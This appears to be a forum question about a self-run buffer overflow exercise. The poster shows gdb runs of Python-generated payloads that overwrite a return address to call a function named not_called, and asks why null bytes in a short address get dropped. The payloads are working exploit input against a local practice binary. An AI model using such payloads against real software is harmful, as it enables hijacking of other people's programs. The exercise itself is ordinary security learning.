I am using buffer overflow to overwrite the return address and calls another function. The name of function I call by overwriting the return address is not_called. Here is how I create the payload
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')
The program works in the above case and not_called function is called. The problem arises when address of not_called is in this format : 0x57d.
When I create payload as follows :
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
I get the following error and program won't work.
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
/bin/bash: warning: command substitution: ignored null byte in input
0xffffd07c
Program received signal SIGSEGV, Segmentation fault.
0x5600057d in ?? ()
If you look at address at SIGSEV, it is 0x5600057d, it should have been 0x0000057d.
For example, If I try some random address as 0x3412057d, you can see that seg fault occurs at that address.
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*112 +"\x7d\x05\x12\x34")')
0xffffd06c
Program received signal SIGSEGV, Segmentation fault.
0x3412057d in ?? ()
I can see that function bash is also giving some warning with null bytes. Dows this have to do something ? How can I pass such a small address ?
